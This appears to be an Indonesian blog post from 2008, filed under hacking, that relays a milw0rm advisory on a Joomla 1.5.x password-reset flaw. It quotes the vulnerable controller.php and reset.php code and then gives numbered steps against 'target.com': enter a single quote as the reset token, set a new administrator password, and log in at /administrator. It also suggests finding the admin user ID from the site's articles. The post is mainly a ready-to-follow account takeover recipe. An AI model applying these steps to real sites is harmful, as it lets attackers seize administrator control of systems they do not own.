Archive for August 2008

Joomla 1.5.x Remote Admin Password Change

August 23, 2008, 14:36

Baru-baru ini telah ditemukan sebuah celah keamanan pada Joomla CMS yang memungkinkan sang
attacker merest password administrator.Celah tersebut ditemukan
oleh seorang hacker Polandia dengan nick name d3m0n (d3m0n@o2.pl).

Hacker tersebut menemukan kelemahan pada file controller.php dan reset.php

 

################################################################################Line : 379-399

function confirmreset(){// Check for request forgeriesJRequest::checkToken() or die( 'Invalid Token' );

// Get the input$token = JRequest::getVar('token', null, 'post', 'alnum'); {1}

// Get the model$model = &$this->getModel('Reset');

// Verify the tokenif ($model->confirmReset($token) === false)  {2}{$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);return false;}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');}

################################################################################

File : /components/com_user/models/reset.php

Line: 111-130

function confirmReset($token){global $mainframe;

$db = &JFactory::getDBO();$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation =   '.$db->Quote($token));  {3}

// Verify the tokenif (!($id = $db->loadResult())){$this->setError(JText::_('INVALID_TOKEN'));return false;}

// Push the token and user id into the session$mainframe->setUserState($this->_namespace.'token', $token);$mainframe->setUserState($this->_namespace.'id', $id);

return true;}################################################################################

Masukan karakter petik tunggal [ ' ] pada tanda {1}Jika kita tekan enter maka query yg dihasilkan adalah :

"SELECT id FROM jos_users WHERE block = 0 AND activation = '' " tanda {3}

Contoh penggunaan kelemahan tersebut sebagai berikut:

1. target.com/index.php?option=com_user&view=reset&layout=confirm2. Masukan karakter petik tunggal [ ' ] pada field token kemudian enter3. Masukan password admin yang baru4. Kemudian login di login page nya => target.com/administrator5. Login dengan menggunakan password yang telah kita masukan sebelumnya

Kekurangan dari kelemahan ini adalah kita harus tau userID sangadministrator tersebut.Namun hal itu tidak masalah karenakita dapatmenemukan userID pada setiap artikel yang ditulis di site tersebut

Sumber: milw0rm.com
  • Share/Bookmark
Category: Hacking, Joomla  |  2 Comments